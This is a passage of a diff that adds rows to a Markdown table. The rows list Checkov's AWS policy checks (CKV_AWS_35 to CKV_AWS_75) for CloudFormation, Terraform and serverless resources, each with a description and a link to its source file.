+|  233 | CKV_AWS_35               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Terraform               | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py)                                                                         |
+|  234 | CKV_AWS_36               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Cloudformation          | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py)                                                                            |
+|  235 | CKV_AWS_36               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Terraform               | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py)                                                                                 |
+|  236 | CKV_AWS_37               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS control plane logging is enabled for all log types                                                                                                                                     | Terraform               | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py)                                                                                   |
+|  237 | CKV_AWS_38               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0                                                                                                                                            | Terraform               | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py)                                                                                         |
+|  238 | CKV_AWS_39               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS public endpoint disabled                                                                                                                                                               | Terraform               | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py)                                                                                                 |
+|  239 | CKV_AWS_40               | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation          | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                            |
+|  240 | CKV_AWS_40               | resource                         | aws_iam_policy_attachment                                                                        | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  241 | CKV_AWS_40               | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  242 | CKV_AWS_40               | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  243 | CKV_AWS_41               | provider                         | aws                                                                                              | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py)                                                                                                         |
+|  244 | CKV_AWS_41               | resource                         | serverless_aws                                                                                   | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | serverless              | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py)                                                                                                  |
+|  245 | CKV_AWS_42               | resource                         | AWS::EFS::FileSystem                                                                             | Ensure EFS is securely encrypted                                                                                                                                                                         | Cloudformation          | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py)                                                                                  |
+|  246 | CKV_AWS_42               | resource                         | aws_efs_file_system                                                                              | Ensure EFS is securely encrypted                                                                                                                                                                         | Terraform               | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py)                                                                                       |
+|  247 | CKV_AWS_43               | resource                         | AWS::Kinesis::Stream                                                                             | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Cloudformation          | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py)                                                                    |
+|  248 | CKV_AWS_43               | resource                         | aws_kinesis_stream                                                                               | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Terraform               | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py)                                                                         |
+|  249 | CKV_AWS_44               | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Cloudformation          | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                              |
+|  250 | CKV_AWS_44               | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Terraform               | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                                   |
+|  251 | CKV_AWS_45               | resource                         | AWS::Lambda::Function                                                                            | Ensure no hard-coded secrets exist in Lambda environment                                                                                                                                                 | Cloudformation          | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                                  |
+|  252 | CKV_AWS_45               | resource                         | AWS::Serverless::Function                                                                        | Ensure no hard-coded secrets exist in Lambda environment                                                                                                                                                 | Cloudformation          | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                                  |
+|  253 | CKV_AWS_45               | resource                         | aws_lambda_function                                                                              | Ensure no hard-coded secrets exist in lambda environment                                                                                                                                                 | Terraform               | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                                       |
+|  254 | CKV_AWS_46               | resource                         | AWS::EC2::Instance                                                                               | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Cloudformation          | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py)                                                                                              |
+|  255 | CKV_AWS_46               | resource                         | aws_instance                                                                                     | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  256 | CKV_AWS_46               | resource                         | aws_launch_configuration                                                                         | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  257 | CKV_AWS_46               | resource                         | aws_launch_template                                                                              | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  258 | CKV_AWS_47               | resource                         | AWS::DAX::Cluster                                                                                | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Cloudformation          | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py)                                                                                                |
+|  259 | CKV_AWS_47               | resource                         | aws_dax_cluster                                                                                  | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Terraform               | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py)                                                                                                     |
+|  260 | CKV_AWS_48               | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker logging is enabled                                                                                                                                                                      | Terraform               | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py)                                                                                                 |
+|  261 | CKV_AWS_49               | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py)                                                                                   |
+|  262 | CKV_AWS_49               | resource                         | serverless_aws                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | serverless              | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py)                                                                              |
+|  263 | CKV_AWS_50               | resource                         | aws_lambda_function                                                                              | X-Ray tracing is enabled for Lambda                                                                                                                                                                      | Terraform               | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py)                                                                                             |
+|  264 | CKV_AWS_51               | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Cloudformation          | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py)                                                                                          |
+|  265 | CKV_AWS_51               | resource                         | aws_ecr_repository                                                                               | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Terraform               | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py)                                                                                               |
+|  266 | CKV_AWS_53               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has block public ACLs enabled                                                                                                                                                           | Cloudformation          | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py)                                                                                        |
+|  267 | CKV_AWS_53               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has block public ACLS enabled                                                                                                                                                           | Terraform               | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py)                                                                                             |
+|  268 | CKV_AWS_54               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Cloudformation          | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py)                                                                                    |
+|  269 | CKV_AWS_54               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Terraform               | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py)                                                                                         |
+|  270 | CKV_AWS_55               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Cloudformation          | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py)                                                                                      |
+|  271 | CKV_AWS_55               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Terraform               | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py)                                                                                           |
+|  272 | CKV_AWS_56               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has RestrictPublicBuckets enabled                                                                                                                                                       | Cloudformation          | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                            |
+|  273 | CKV_AWS_56               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has 'restrict_public_buckets' enabled                                                                                                                                                   | Terraform               | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                                 |
+|  274 | CKV_AWS_57               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket does not allow WRITE permissions to everyone                                                                                                                                        | Cloudformation          | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py)                                                                                          |
+|  275 | CKV_AWS_57               | resource                         | aws_s3_bucket                                                                                    | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform               | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                                       |
+|  276 | CKV_AWS_57               | resource                         | aws_s3_bucket_acl                                                                                | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform               | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                                       |
+|  277 | CKV_AWS_58               | resource                         | AWS::EKS::Cluster                                                                                | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Cloudformation          | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py)                                                                                  |
+|  278 | CKV_AWS_58               | resource                         | aws_eks_cluster                                                                                  | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Terraform               | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py)                                                                                       |
+|  279 | CKV_AWS_59               | resource                         | AWS::ApiGateway::Method                                                                          | Ensure there is no open access to back-end resources through API                                                                                                                                         | Cloudformation          | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py)                                                                            |
+|  280 | CKV_AWS_59               | resource                         | aws_api_gateway_method                                                                           | Ensure there is no open access to back-end resources through API                                                                                                                                         | Terraform               | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py)                                                                                 |
+|  281 | CKV_AWS_60               | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Cloudformation          | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                        |
+|  282 | CKV_AWS_60               | resource                         | aws_iam_role                                                                                     | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Terraform               | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                             |
+|  283 | CKV_AWS_61               | resource                         | AWS::IAM::Role                                                                                   | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Cloudformation          | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                                |
+|  284 | CKV_AWS_61               | resource                         | aws_iam_role                                                                                     | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Terraform               | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                                     |
+|  285 | CKV_AWS_62               | resource                         | AWS::IAM::Group                                                                                  | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                              |
+|  286 | CKV_AWS_62               | resource                         | AWS::IAM::Policy                                                                                 | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                              |
+|  287 | CKV_AWS_62               | resource                         | AWS::IAM::Role                                                                                   | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                              |
+|  288 | CKV_AWS_62               | resource                         | AWS::IAM::User                                                                                   | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                              |
+|  289 | CKV_AWS_62               | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  290 | CKV_AWS_62               | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  291 | CKV_AWS_62               | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  292 | CKV_AWS_62               | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  293 | CKV_AWS_62               | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  294 | CKV_AWS_63               | resource                         | AWS::IAM::Group                                                                                  | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                    |
+|  295 | CKV_AWS_63               | resource                         | AWS::IAM::Policy                                                                                 | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                    |
+|  296 | CKV_AWS_63               | resource                         | AWS::IAM::Role                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                    |
+|  297 | CKV_AWS_63               | resource                         | AWS::IAM::User                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                    |
+|  298 | CKV_AWS_63               | resource                         | aws_iam_group_policy                                                                             | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  299 | CKV_AWS_63               | resource                         | aws_iam_policy                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  300 | CKV_AWS_63               | resource                         | aws_iam_role_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  301 | CKV_AWS_63               | resource                         | aws_iam_user_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  302 | CKV_AWS_63               | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  303 | CKV_AWS_64               | resource                         | AWS::Redshift::Cluster                                                                           | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Cloudformation          | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py)                                                                        |
+|  304 | CKV_AWS_64               | resource                         | aws_redshift_cluster                                                                             | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Terraform               | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py)                                                                             |
+|  305 | CKV_AWS_65               | resource                         | AWS::ECS::Cluster                                                                                | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Cloudformation          | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py)                                                                    |
+|  306 | CKV_AWS_65               | resource                         | aws_ecs_cluster                                                                                  | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Terraform               | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py)                                                                         |
+|  307 | CKV_AWS_66               | resource                         | AWS::Logs::LogGroup                                                                              | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Cloudformation          | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                                    |
+|  308 | CKV_AWS_66               | resource                         | aws_cloudwatch_log_group                                                                         | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Terraform               | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                                         |
+|  309 | CKV_AWS_67               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Cloudformation          | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py)                                                                                |
+|  310 | CKV_AWS_67               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Terraform               | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py)                                                                                     |
+|  311 | CKV_AWS_68               | resource                         | AWS::CloudFront::Distribution                                                                    | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Cloudformation          | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py)                                                                                                      |
+|  312 | CKV_AWS_68               | resource                         | aws_cloudfront_distribution                                                                      | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Terraform               | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py)                                                                                                           |
+|  313 | CKV_AWS_69               | resource                         | AWS::AmazonMQ::Broker                                                                            | Ensure Amazon MQ Broker should not have public access                                                                                                                                                    | Cloudformation          | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py)                                                                      |
+|  314 | CKV_AWS_69               | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker is not publicly exposed                                                                                                                                                                 | Terraform               | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py)                                                                           |
+|  315 | CKV_AWS_70               | resource                         | aws_s3_bucket                                                                                    | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform               | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                                       |
+|  316 | CKV_AWS_70               | resource                         | aws_s3_bucket_policy                                                                             | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform               | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                                       |
+|  317 | CKV_AWS_71               | resource                         | AWS::Redshift::Cluster                                                                           | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Cloudformation          | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py)                                                                              |
+|  318 | CKV_AWS_71               | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Terraform               | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py)                                                                                   |
+|  319 | CKV_AWS_72               | resource                         | aws_sqs_queue_policy                                                                             | Ensure SQS policy does not allow ALL (*) actions.                                                                                                                                                        | Terraform               | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py)                                                                                                             |
+|  320 | CKV_AWS_73               | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Cloudformation          | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py)                                                                                              |
+|  321 | CKV_AWS_73               | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Cloudformation          | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py)                                                                                              |
+|  322 | CKV_AWS_73               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Terraform               | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py)                                                                                                   |
+|  323 | CKV_AWS_74               | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Cloudformation          | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py)                                                                                            |
+|  324 | CKV_AWS_74               | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Terraform               | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py)                                                                                                 |
+|  325 | CKV_AWS_75               | resource                         | aws_globalaccelerator_accelerator                                                                | Ensure Global Accelerator accelerator has flow logs enabled                                                                                                                                              | Terraform               | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py)                                                       |
